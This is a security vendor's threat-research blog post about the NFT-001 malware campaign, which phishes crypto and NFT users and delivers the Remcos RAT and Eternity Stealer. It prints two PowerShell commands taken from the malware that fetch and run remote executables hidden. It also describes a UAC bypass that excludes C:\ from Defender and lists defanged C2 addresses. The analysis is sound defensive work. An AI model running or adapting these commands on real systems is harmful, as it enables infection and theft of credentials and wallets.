Cybersecurity Tech Investment Planning: Use annual loss expectancy to build a business case
arrow-white arrow-white Download now

Watch Out for the New NFT-001

Posted by Morphisec Labs on September 22, 2022

A non-fungible token (NFT) is a record on a blockchain associated with a digital or physical asset—usually a digital file such as a photo, video, or audio. An NFT’s ownership is recorded in the blockchain, and it can be sold and traded. NFTs differ from cryptocurrencies, which are mostly fungible, in that NFTs are unique and non-substitutable. The NFT market is booming, with trading volume exploding by over 20,000 percent from 2020 to 2021. Cybercriminals have rushed to exploit this trend, which the Morphisec Threat Labs team has previously examined in a white paper. The Threat Labs team now has fresh research on the crypto and NFT malware NFT-001, which first surfaced in November 2020.  

The NFT-001 attack sequence typically includes the following steps:  

  • Attackers target users in crypto and NFT communities on Discord and other forums  
  • The victim receives a private phishing message related to an NFT or financial opportunity. The message includes a link to a fake website and malicious app that promises an improved user experience 
  • The downloaded malware unpacks a remote access trojan (RAT) that is used to steal browsing data, install a keylogger, and other surveillance functionalities  
  • The attacker then uses the data for identity theft and to steal the victim’s wallet and other possessions  

 The threat actor has now switched from the Babadeda crypter to a new staged downloader while using the same delivery infrastructure as before. The new downloader adds increased defense evasion abilities to this malware. 

Zero Trust and Moving Target Defense White Paper

New NFT-001 Technical Details 

Morphisec Labs has tracked several waves of the NFT malware delivering the Remcos RAT since it first surfaced. In June 2022 we found a shift in the crypter used to deliver the Remcos RAT. The Babadeda crypter has now been discarded for a new staged downloader. 

Date  Packer/Crypter 
C2 Port
11/2020 - 07/2021 Custom .NET packer Remcos  95.217.114[.]96
07/2021 - 08/2021  Crypto Obfuscator (.NET)  Remcos 135.181.17[.]47  4783
08/2021 - 10/2021  BABADEDA BitRAT 135.181.140[.]182 
11/2021 - 12/2021  BABADEDA using DLL sideloading with IIS Express  Remcos 
65.21.127[.]164  4783 
12/2021 - 02/2022 BABADEDA using DLL sideloading with Adobe / TopoEdit  Remcos 193.56.29[.]242  4783
01/2022 - 03/2022  BABADEDA using DLL sideloading with Link.exe  Remcos 157.90.1[.]54  4783
April 2022  BABADEDA using DLL sideloading with Adobe  Remcos 145.239.253[.]176  4782
07/2022 - *Active  BABADEDA using DLL sideloading with Mp3tag.exe  Remcos 65.108.9[.]124  4783
06/2022 - *Active  Downloader Remcos 144.91.79[.]86  4444 

 The malware delivery hasn’t changed much. It sends a user a private message enticing them to download a related application supposedly granting the user access to the newest features. Below is an example of the phishing message targeting users of “Dune”—an Ethereum-based crypto data analytics platform. 

Dune phishing messageIf a user clicks the hyperlink in the message, it directs him to a decoy website that mimics the original. There, the user is prompted to download the malicious “installer” which infects the victim’s machine with the Remcos RAT. 

Dune decoy site

For more information on the infrastructure, read Morphisec’s previously mentioned white paper, “Journey of a Crypto Scammer.”  

The New Staged Downloader 

 The threat actor keeps the first stage “installers” with a low detection rate. 

NFT-001 installersThe execution starts by performing a User Account Control (UAC) bypass. It hijacks the default handler for the ms-settings protocol and sets it to execute a Powershell command that adds the C:\ folder to the Windows Defender exclusion list. The code that performs this UAC bypass technique is well documented in the open-source repository. But the attacker employed it extremely poorly—he didn't even bother to remove unnecessary WinAPI calls, such as printing to the console. 

UAC bypass codeAfter excluding the C:\ folder from Windows Defender, the following Powershell commands are de-obfuscated and executed: 

1) The first Powershell command downloads and executes a plain Remcos RAT (C2 - 144.91.79[.]86).

powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://rwwmefkauiaa[.]ru/bs8bo90akv.exe -OutFile \"$env:appdata/Microsoft/dllservice.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/dllservice.exe\" 

The C2 used in that Remcos RAT was also seen in the wild in samples using the Babadeda crypter. This bolsters our suspicion it's the same threat actor. 

2) The second Powershell command downloads and executes Eternity Stealer which steals sensitive information from a victim’s machine such as:  
  • Browser information like login credentials, history, cookies 
  • VPN and FTP client data 
  • Messaging software data 
  • Password management software data
powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden $ProgressPreference = 'SilentlyContinue'; mkdir \"$env:appdata/Microsoft/AddIns\"; Invoke-WebRequest http://rwwmefkauiaa[.]ru/u84ls.exe -OutFile \"$env:appdata/Microsoft/AddIns/exclusions.exe\"; Start-Process -Filepath \"$env:appdata/Microsoft/AddIns/exclusions.exe\" 

We also noticed a variant of this downloader in the Tandem Espionage campaign shares commonalities with this campaign: 

  • There is a similar UAC bypass technique using fodhelper.exe (less evasive implementation)
  • Downloading and executing two malicious executables (Arkei stealer and Eternity stealer) 
  • The Eternity stealer is downloaded by the exact same Powershell command as the second Powershell command from the same URL 

Though the URL downloading the Eternity stealer is the same, we think these may be two different threat actors that used the same downloader as a service. 

Defending Against NFT Malware Like NFT-001 

The crypto and NFT communities are on the cutting edge of financial innovation, and they are a lucrative target for attackers. This new staged downloader for NFT-001 is more evasive than the earlier version, increasing its ability to sneak past traditional cybersecurity solutions. According to the latest Picus report, defense evasion is now the most popular tactic among malware operators. 

This tactic is popular because there aren’t many effective tools against defense evasion. One such tool is Morphisec’s revolutionary Moving Target Defense (MTD) technology, which comprehensively prevents defense evasion techniques. Unlike other cybersecurity solutions which focus on detecting known patterns with response playbooks, MTD preemptively blocks attacks on memory and applications and remediates the need for a response. To learn more about Morphisec’s revolutionary Moving Target Defense technology, read the white paper: Zero Trust + Moving Target Defense: The Ultimate Ransomware Strategy. 

Zero Trust and Moving Target Defense White Paper




Decoy Websites